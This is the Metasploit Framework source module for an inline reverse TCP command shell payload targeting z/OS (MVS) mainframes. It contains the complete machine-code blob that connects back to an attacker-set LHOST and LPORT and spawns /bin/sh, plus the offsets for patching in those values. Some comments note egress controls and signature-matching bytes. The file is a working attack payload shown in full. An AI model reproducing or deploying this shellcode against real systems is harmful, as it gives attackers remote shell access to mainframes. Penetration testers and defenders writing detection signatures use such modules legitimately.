rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/mainframe/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# This payload has no ebcdic<->ascii translator built in.
# Therefore it must use a shell which does, like mainframe_shell
#
#
##
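# Inline (single) reverse TCP command shell payload definition for z/OS (MVS).
#
# The module is purely declarative: it hands the framework a metadata hash and
# a fixed machine-code blob. The blob carries no EBCDIC<->ASCII translation,
# which is why the session type is Msf::Sessions::MainframeShell.
module MetasploitModule
  # Byte length of the 'Payload' string below (21 rows of 16 bytes plus 3).
  CachedSize = 339

  include Msf::Payload::Single
  include Msf::Payload::Mainframe
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata and raw bytes with the framework.
  #
  # @param info [Hash] metadata supplied by the caller; combined with the
  #   values declared here through merge_info before being passed to super
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP Inline',
        # Reverse payload: the handler is Msf::Handler::ReverseTcp, so the
        # target opens the TCP connection outward to LHOST:LPORT. Egress
        # filtering and outbound-connection logging on the mainframe side are
        # therefore the relevant network controls, not inbound listener rules.
        'Description' => %q{
          Connect back to the handler and spawn a command shell.
          This implementation does not include ebcdic character translation,
          so a client with translation capabilities is required. MSF handles
          this automatically.
        },
        'Author' => 'Bigendian Smalls',
        'License' => MSF_LICENSE,
        'Platform' => 'mainframe',
        'Arch' => ARCH_ZARCH,
        'Handler' => Msf::Handler::ReverseTcp,
        # Session class that supplies the character translation the blob lacks.
        'Session' => Msf::Sessions::MainframeShell,
        'Payload' => {
          # Byte offsets inside the blob where the configured values are
          # substituted. As shipped, bytes 321-322 are 00 00 and bytes 323-326
          # are 7f 00 00 01 (127.0.0.1), i.e. placeholders.
          # NOTE(review): 'n' presumably means a 16-bit big-endian port and
          # 'ADDR' a packed IPv4 address - confirm against the framework's
          # offset substitution code.
          'Offsets' =>
            {
              'LPORT' => [ 321, 'n' ],
              'LHOST' => [ 323, 'ADDR' ]
            },
          # Fixed machine code followed by constant data. Decoded as EBCDIC,
          # the data at the tail holds the 8-byte, space-padded names BPX1SOC,
          # BPX1CON, BPX1EXC and BPX1FCT (these appear to be z/OS UNIX callable
          # service names) and the path /bin/sh. Those byte strings do not vary
          # between generated payloads except at the two offsets above, so they
          # are the stable part a static signature can match.
          # The bytes must stay exactly as they are: CachedSize and both
          # offsets depend on the blob's length and layout.
          'Payload' =>
            "\x18\x7f\xa5\x76\x1f\xff\x41\x17\x01\x54\xd7\xcb\x10\x00\x10\x00" \
            "\x41\xd7\x01\xd8\xa7\x88\x00\x08\xa7\x98\x00\x01\xa7\xa8\x00\x02" \
            "\x41\x07\x01\x1c\x41\x30\x00\x08\x41\x57\x01\x9c\x50\xa7\x01\x9c" \
            "\x50\x97\x01\xa0\x50\x97\x01\xa8\x41\xf7\x00\xcc\x0d\xef\x58\x57" \
            "\x01\xac\x50\x57\x01\xbc\x41\x17\x01\x3e\x41\x57\x01\xbc\xd2\x08" \
            "\x50\x07\x10\x00\x41\x07\x01\x24\x41\x30\x00\x06\x41\x57\x01\xbc" \
            "\x41\xf7\x00\xcc\x0d\xef\xa7\xb8\x00\x02\xa7\xf4\x00\x1e\xa7\xba" \
            "\xff\xff\xec\xb7\xff\xfc\xff\x7e\x41\x17\x01\x48\x50\xa7\x01\x80" \
            "\x41\x27\x01\x80\x50\x20\x10\x10\x41\x27\x01\x3c\x50\x20\x10\x14" \
            "\x50\x97\x01\x54\x41\x07\x01\x2c\x41\x30\x00\x0d\x41\x57\x01\x48" \
            "\x41\xf7\x00\xcc\x0d\xef\x41\x07\x01\x34\x50\x87\x01\x88\x58\x57" \
            "\x01\xac\x50\x57\x01\x84\x50\xb7\x01\x8c\x41\x30\x00\x06\x41\x57" \
            "\x01\x84\x41\xf7\x00\xcc\x0d\xef\xa7\xf4\xff\xd3\x50\xe0\xd0\x08" \
            "\x17\x11\x0a\x08\x50\x0d\x00\x0c\x58\xfd\x00\x0c\xa7\x68\x00\x14" \
            "\x41\x16\xd0\x00\x50\x56\xd0\x00\xa7\x3a\xff\xff\xec\x38\x00\x14" \
            "\x0b\x7e\xa7\x6a\x00\x04\xa7\x5a\x00\x04\xec\x37\xff\xf5\x00\x7e" \
            "\x41\x56\xd0\x00\xa7\x5a\xff\xfc\x96\x80\x50\x00\x05\xef\x58\xe0" \
            "\xd0\x08\x07\xfe\xa7\x5a\x00\x04\xa7\xf4\xff\xed\xc2\xd7\xe7\xf1" \
            "\xe2\xd6\xc3\x40\xc2\xd7\xe7\xf1\xc3\xd6\xd5\x40\xc2\xd7\xe7\xf1" \
            "\xc5\xe7\xc3\x40\xc2\xd7\xe7\xf1\xc6\xc3\xe3\x40\xa2\x88\x10\x02" \
            "\x02\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x07\x61\x82\x89\x95" \
            "\x61\xa2\x88"
        }
      )
    )
  end
end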